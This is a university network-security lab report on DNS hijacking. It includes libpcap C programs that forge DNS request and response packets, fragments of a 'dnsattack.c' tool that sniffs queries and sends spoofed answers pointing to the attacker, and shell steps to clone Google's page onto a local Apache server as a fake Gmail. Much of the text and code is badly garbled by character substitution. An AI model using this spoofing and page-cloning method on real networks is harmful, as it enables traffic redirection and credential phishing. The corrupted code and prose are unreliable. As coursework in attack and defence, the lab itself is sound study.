INTERNATIONAL UNIVERSITY School of Computer Science and Engineering LAB 2: DNS attack (Part 1 + 2) Course !ate Network Security Lecturer Pham Van Hau,PhD
24/09/2013
Duration: 180 minutes
Student name '( N)* T+I
Student I! "IT"#$#%&
Introduction
To do the DNS Hijacking attack, you need to know how to generate, capture the packets programmatically. Understand the udp, dns packet headers as well as the dns protocol The purpose of this lab is to gi e you hands!on e"perience on low le el network programming. #ore precisely, you are going to create the dns re$uest and response. These will help you a lot for the ne"t lab %&. 'n general, to generate the raw packet you can use pcap library (http%))www.tcpdump.org)pcap.html&. *ibnet library http%))packetfactory.openwall.net)projects)libnet)dist)deprecated)manual)lrm.html or e en the standard +,' http%))en.wikipedia.org)wiki)-erkeley.sockets 'n the conte"t of this lab, we use pcap library for our purpose. Se eral useful information can be found at http%))www.tcpdump.org)pcap.html To help you to ha e an idea how the dns packet look like, on your linux machine • open wireshark to capture the traffic • open a terminal and e"ecute /nslookup ne"press.net0 Try to look at the different fields of the captured dns!packet and understand what they are used for. This link http%))www.networksorcery.com)enp)protocol)dns.htm is also a great source for this purpose.
Part I: DNS packet generation
To help you on the programming stuff, ' ha e created two programs, called dns_request_gen.c and dns_response_gen.c. The programs ' sent to you are not complete. 1ou need to modify them at se eral places ( ' ha e marked as /T2 -3 #2D'4'3D0&. I. DNS packet request #odify dns_request_gen.c to generate the dns re$uest that ha e the • source #+5% +6 +7 +8 +9 +: +; • destination #+5% -6 -7 -8 -9 -: -; • source port% 9<<< • destination port% :8 • Transaction 'D% ++-• source ', address%6.7.8.9 • destination ', address% ;.=.>.? • dns $uerry to ask the ', address of / ne"press.net0
Answer% Dntai_dns_request_v1.c (without ip, udp checksum )
#include <string.h> //strlen #include <stdlib.h> //malloc #include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; /* functions */ 5oid print_app_info(5oid){ printf(B+ns re3uest 5ersion ! writen by +o -hu &aiCnB); } 5oid +-#_name_con5erter(char host,char dns); 5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9;
int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
int main(int argc,char {
arg5[])
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B!.7.H."B); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B(.2.:.OB); // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons("999); /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons(JH); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 9!99); dns&$3_count!htons(9 99!); dns&$ans_count!9; dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns re$uest packets
A 3thernet Header
A ', Header (with checksum error&
A UD, Header
A Dns Buery
II. DNS packet response #odify dns_response_gen.c to generate the dns response that ha e the • source #+5% -6 -7 -8 -9 -: -; • destination #+5% +6 +7 +8 +9 +: +; • source port% :8 • destination port% 9<<<
• Transaction 'D% ++-• source ', address%;.=.>.? • destination ', address% 6.7.8.9 • dns response% the ip address of / ne"press.net0 is /666.;:.79>.6870 Answer% Dntai_dns_response_v1.c (without ip, udp checksum )
#include <string.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <netinet/in.h> #include <unistd.h> #include <pcap.h> /* Ethernet headers are #define #$%E_E&' !" //strlen //malloc //you know what this is for //inet_addr , inet_ntoa , ntohs etc //getpid always e actly !" bytes */
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
/* transaction $+ */ /* flags */ /* number of 3uestion entries */
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /* // Ehen get to the last character // #tore the final counter into the dns name buffer
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */ bcopy(BC c9C 9cB,(dns_as&$a_name,7);
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } return 9; }
@esult with capturing packet% A @ecei e ; dns response packets
III.DNS packet response The checksum (of ip and udp headers) of the generated packets are wrong. Do the necessary to make them right. Answer% Dntai_dns_request_v..c (with ip, udp checksum )
#include <string.h> #include <stdlib.h> //strlen //malloc
#include <sys/socket.h> //you know what this is for #include <arpa/inet.h> //inet_addr , inet_ntoa , ntohs etc #include <netinet/in.h> #include <unistd.h> //getpid #include <pcap.h> /* Ethernet headers are always e actly !" bytes */ #define #$%E_E&' !" /* Ethernet addresses are ( bytes */ #define E&'E)_*++)_,E- ( /* .+/ /)0&010, */ #define .+/_/)0, !2 struct dns_3uery { u_short 3_type; u_short 3_class; }; /* type of the host */ /* class */
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ };
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9;
// 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; // Ehen get to the last character // #tore the final counter into the dns name buffer
}
/* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords)
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } return 0sum; arg5[])
int main(int argc,char {
char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; // host name to look up ip. E I 5ne press.net char de5; // network de5ice to capture. E I eth9 u_char packet[J999]; // packet is buffer to contain data print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet =LEthernetM N L$/M N L&1//.+/M N L*pplicationM> memset(packet,9,"9O();// packet la mang de chua du lieu bat duoc /* ????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; // // // // pointer pointer pointer pointer chi chi chi chi toi toi toi toi 5ung 5ung 5ung 5ung dau dau dau dau cua cua cua cua ethernet header ip header udp header dns header
u_char 3_name; int host_len!strlen(host); =5ne press.net co lenQ!H> struct dns_3uery dns_3r; int siFe_3_name!host_len"7;
// pointer chi toi 5ung dau chua 3uery_name // do dai cua 3uery name chinh la so ky tu cua host name // pointer chi toi 5ung dau cua dns 3uery // kich thuoc cua 3uery name 5a dns 3uery header =7>
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */
5oid +-#_name_con5erter(char host,char dns) { int len!strlen(host); dns[len"7]!9; int count!9; // 8or counting number of charaters from begin until meet a DdotD whi#e(len$9){ // Ehile host name length is larger than or e3ual to Fero i%(host[len&!]!!D.D) // 1ount from last character of host name if there is a DdotD { dns[len]!count; // #tore counted number into the dns name buffer count!9; // #et count to Fero for recount }e#se{ dns[len]!host[len&!]; // $f character is not a DdotD store it into the dns name buffer count""; } // $ncrease count len&&; // +ecrease len } dns[9]!count; } /* ???????????? 8.-1&$0- 1)E*&E 1'E1<#.; 08 .+/, $/ ???????????????? */ unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; %or (i!9; i-(nwords/7); i"") sum "! buf[i]; buf, int nwords) // Ehen get to the last character // #tore the final counter into the dns name buffer
sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); return 0sum;
} unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); return 0sum; } int main(int argc,char arg5[]) { u_char packet[J999]; char de5; // network de5ice char errb[/1*/_E))G.8_#$%E]; pcap_t descr; // session description bpf_u_intH7 net; // ip of de5ice bpf_u_intH7 mask; // subnet mask int i,result,siFe_ip; u_char host; print_app_info(); i%(argc'!H){ printf(B.sageI Ks <-etwork +e5iceDs -ame> <'ostname e Iwww.5ne press.net> CnB,arg5[9]); e it(!); }e#se{ de5!arg5[!]; host!arg5[7]; } // cheking for suitable network de5ice and store the ip,subnet mask for future use i%(pcap_lookupnet(de5,(net,(mask,errb) !! &!){ printf(BErrorI KsCnB,errb); e it(!); } // set the pcap description descr ! pcap_open_li5e(de5,G.8#$%,!,9,errb); i% (descr !! )*++){ printf(B#et description failedI KsCnB, errb); e it(!); } // Fero out the packet memset(packet,9,"9O(); /*
????????????????????? &ao mot goi tin L+-# )EP.E#&M ???????????????????????? Ethernet 'eader N $/ 'eader N .+/ 'eader N +-# 'eader N Puery -ame N +ns Puery */ struct struct struct struct struct ethernet_header eth; ip_header ip; udp_header udp; dns_header dns; dns_3uery dns_3r; dns_as; // // // // // pointer pointer pointer pointer pointer chi chi chi chi chi toi toi toi toi toi 5ung 5ung 5ung 5ung 5ung dau dau dau dau dau cua cua cua cua cua ethernet header ip header udp header dns header dns 3uery
u_char 3_name; struct dns_answer
// +ns name in 3uery // pointer chi toi 5ung dau cua dns answer // 'ostname length // kich thuoc cua 3uery name 5a dns 3uery header =7>
int host_len!strlen(host); int siFe_3_name!host_len"7;
// $/ 5ersion " @ length Q J words =79 bytes> // +ifferentiated #er5ices 8ield // $dentification // time to li5e // .+/ protocol // ip checksum =44>
(ip&$ip_src).s_addr ! inet_addr(B(.2.:.OB); // source ip address /****************************&0 GE ;0+$8$E+ J ***************************/ (ip&$ip_dst).s_addr ! inet_addr(B!.7.H."B);; // destination ip address /* .+/ 'eader */ udp&$udp_sport ! htons(JH); // source port /****************************&0 GE ;0+$8$E+ ( ***************************/ udp&$udp_dport ! htons("999); // destination port udp&$udp_sum ! 9; // udp checksum =44> /* +-# 'eader */ dns&$id!htons(9 **GG); dns&$flags!htons(9 :!:9); dns&$3_count!htons(9 99!); dns&$ans_count!htons(9 99!); dns&$auth_count!9; dns&$add_count!9; // // // // // // transaction $+ flags =standard 3uery> number of 3uestion number of answer number of authority number of resource
/* +-# PueryI 3uery_name, dns 3uery header, dns 3uery answer */ // 1on5ert hostname to dns format and store in memory where 3_name point to +-#_name_con5erter(host,3_name); dns_3r&$3_type!htons(!); // type of the host dns_3r&$3_class!htons(!); // class /* +-# *nswer */
/****************************&0 GE ;0+$8$E+ 2 ***************************/ dns_as&$a_addr.s_addr ! inet_addr(B!!!.(J.7":.!H7B); /* .pdate ,ength $p 'eader and .dp 'eader */ udp&$udp_len! htons(si,eo%(struct udp_header) " si,eo%(struct dns_header)"siFe_3_name"si,eo%(struct dns_3uery)"si,eo%(struct dns_answer)); ip&$ip_len ! htons(si,eo%(struct ip_header)) " udp&$udp_len; // total length siFe_ip ! $/_',(ip) "; /* ./+*&E 1'E1<#.; 08 $/ 'E*+E) *-+ .+/ 'E*+E) */ ip&$ip_sum!9; ip&$ip_sum! (csum ((unsigned short ) (packet"#$%E_E&') ,siFe_ip)); udp&$udp_sum!9; udp&$udp_sum! htons(udp_csum(ntohs(udp&$udp_len), (u_short )((ip&$ip_src) , (u_short )((ip& $ip_dst), (unsigned short )udp)); /* send packet ( times */ %or (i!9; i -! J; i"") { result ! pcap_sendpacket (descr,packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } } return 9;
@esult with capturing packet% A @ecei e ; dns response packets
Part II: DNS attack
Normal scenario: )ereafter are the steps for the user on )ost% to connect to an ,e-site. e/g/ 0"AIL • On )ost%. user enters ,,,/gmail/com to the -ro,ser • )ost% as1s host2 for the ip address of ,,,/gmail/com • )ost2 returns the ip address of ,,,/google/com 3ipgoogle4 to host% • host% connects 3ipgoogle4 Attack scenario • User enters ,,,/gmail/com to the -ro,ser/ • )ost5 sniffs the traffic on the ,ire and tries to do !NS session hi6ac1ing -7 racing against the host2/ In fact. it tries to pro8ide a fa1e ans,er to host % 3)ost 5 returns its ip address 3ip54 instead of the actual ip address of gmail3ipgoogle4 to host %4 • )ost% recei8e the fa1e ans,er from host 5 and connects to host5 3ip54 in -elie8ing that it is tal1ing to ,,,/google/com Task 1: Create a program running on host5. called dnsattac1/c. in ,hich. it • captures the net,or1 traffic and filter out the dns pac1et 3get the code from La-59part%4 • creates the fa1e response pac1et ,ith the information mentioned a-o8e 3get code from La-59 part%4 • sends the fa1e pac1et to host% To help 7ou in creating the program. I sent 7ou the e:ample of dnsattac1/c program/ You need to add the appreciate code at different palces ,here I ha8e mar1ed ;TO <E "O!I=IE!>/
5ersion << " 6 header length >> 7 */ type of ser5ice */ total length */ identification */ fragment offset field */ reser5ed fragment flag */ dont fragment flag */ more fragments flag */ mask for fragmenting bits */ time to li5e */ protocol */ checksum */
===ip>?>ip_5hl> @ 9 9f> ===ip>?>ip_5hl> >> "> source port */ destination port */ udp length */ udp checksum */
struct dns_header { u_short id; /* transaction $+ */ u_short flags; /* flags */ u_short 3_count; /* number of 3uestion entries */ u_short ans_count; /* number of answer entries */ u_short auth_count; /* number of authority entries */ u_short add_count; /* number of resource entries */ }; pcap_t handle; /* packet capture handle */
/* functions */ 5oid print_app_info(5oid); unsigned short csum (unsigned short buf, int nwords); unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]); unsigned short csum (unsigned short { unsigned long sum!9; int i; buf, int nwords)
%or (i!9; i-(nwords/7); i"") sum "! buf[i]; sum ! (sum $$ !() " (sum ( 9 ffff); sum "! (sum $$ !(); } return 0sum;
unsigned short udp_csum (unsigned short len,unsigned short ip_src[],unsigned short ip_dst[],unsigned short buff[]) { unsigned short udp_protocol ! .+/_/)0,; unsigned short padding ! 9; unsigned long sum; int i; // 8ind out if the length of data is e5en or odd number. $f odd, add a padding byte Q 9 at the end of packet i% (len17 '! 9){ padding !!; buff[len]!9; } // $nitialiFe sum to Fero sum ! 9; // #um all the buffer in !( bit words %or(i!9;i-(len"padding)/7;i"") sum"!ntohs((unsigned short) buff[i]); // #um the pseudo header which contains source ip, destination ip, protocol number and length %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_src[i]); %or(i!9;i-7;i"") sum"!ntohs((unsigned short) ip_dst[i]); sum"! (unsigned short)udp_protocol " (unsigned short)len; whi#e (sum$$!() sum ! (sum ( 9 8888) " (sum $$!(); } char return 0sum; dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
! "o#i$ie# co#e 2:
//&0 GE ;0+$8$E+ 7I your code to swap the $/ addresses struct in_addr ip_addr_tmp; ip_addr_tmp ! ip&$ip_src; ip&$ip_src ! ip&$ip_dst; ip&$ip_dst ! ip_addr_tmp;
! "o#i$ie# co#e %:
//&0 GE ;0+$8$E+ HI your code to swap the udp ports u_short port_tmp; port_tmp ! udp&$udp_sport; udp&$udp_sport ! udp&$udp_dport; udp&$udp_dport ! port_tmp;
! "o#i$ie# co#e &:
/* httpI//www.binarytides.com/c?program?to?get?ip?address?from?interface?name?on?linu / */ #include <net/if.h> #include <sys/ioctl.h> char get_ip_address(char iface, char buf) { struct ifre3 ifr; int fd ! socket(*8_$-E&, #01<_+S)*;, 9); // type of address to retrie5e ? $/5" $/ address ifr.ifr_addr.sa_family ! *8_$-E&; //1opy the interface name in the ifre3 structure strncpy(ifr.ifr_name , iface , $8-*;#$%&!); ioctl(fd, #$01S$8*++), (ifr); close(fd); // result strcpy(buf, inet_ntoa(((struct sockaddr_in return buf; )(ifr.ifr_addr )&$sin_addr));
} U 5oid got_packet(u_char args, const struct pcap_pkthdr header, const u_char { U // &0 GE ;0+$8$E+ "I change the ip address as re3uired dns_as&$a_addr.s_addr!inet_addr(args); 2 } U int main(int argc,char arg5[]) { 2 char ip_current_address[79]; 2 get_ip_address(de5,ip_current_address); printf(B1urrent $/ *ddressI KsCnB, ip_current_address); 2 /* now we can set our callback function */
packet)
pcap_loop(handle, num_packets, got_packet, (u_char )ip_current_address); V U char 2
! "o#i$ie# co#e E tra:
dns_name_re5ert(char 3_name, char int count, len, first, i; count ! 9; len ! 9; first ! 3_name[count]; count""; whi#e(first$9){ %or(i!9;i-first;i""){ host[len] ! 3_name[count]; len""; count""; } first ! 3_name[count]; count ""; i%(first$9) { host[len] ! D.D; len""; } } host[len] ! 9; return host; host){
result ! pcap_sendpacket (handle,new_packet,#$%E_E&'"ntohs(ip&$ip_len)); i%(result !! 9) printf(BL/acket sent sucessfullyMCnB); e#se printf(BL/acket sent failureMCnB); } e#se { printf(BL/acket doesnDt sentMCnB); } 2 V
Task 2: Install a ,e-ser8er on host5. create a home page to ma1e it loo1 li1e ,,,/gmail/com Ans'er: (n )ost2
& & & & & sudo apt&3et insta## apache. sudo service apache. start cd /var/www/ sudo su root w3et 3oo3#e.com 45 inde6.htm#
Task %: Test and ma1e sure 7our attac1 ,or1s 9 On host5. run sudo /?dntai_dns_attack
- On host%. run terminal.
• • T7pe nslookup google.com 3attac1ers redirects dns of google4 T7pe nslookup vnexpress.net
•
Open =irefo:. t7pe in address google*com
•
Screen on )ost %
Question 1: Compare the dns request and dns response with respect to a) Source MAC address and Destination MAC address b) P source, P destination c) source port, destination port Ans'er • !ns Re@uest 8s !ns Reponse a-out "ac Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Ip Address !equest
!esponse
• !ns Re@uest 8s !ns Reponse a-out Aort !equest
!esponse
• Result dns re@uest and response s,ap each other a-out mac address. ip address. and port -et,een source and destination/ Question 2" #hat is the ro$e o% &ransaction D %ie$d o% the DNS packet' Ans'er Transaction I! is a %&9-it field identif7ing a specific !NS transaction/ The transaction I! is created -7 the message originator and is copied -7 the responder into its response message/ Using the transaction I!. the !NS client can match responses to its re@uests/ Question 3: (ind a so$ution to pre)ent dns session hi*ackin+ attack Answer: A solution to prevent dns session hijacking attack is !""#$: The !omain Name S7stem Securit7 E:tensions 3!NSSEC4 is a suite ofInternet Engineering Tas1 =orce 3IET=4 specifications for securing certain 1inds of information pro8ided -7 the !omain Name S7stem 3!NS4 as used on Internet Arotocol 3IA4 net,or1s/ It is a set of e:tensions to !NS ,hich pro8ide to !NS clients 3resol8ers4 origin authentication of !NS data. authenticated denial of e:istence. and data integrit7. -ut not a8aila-ilit7 or confidentialit7/ 3Bi1i4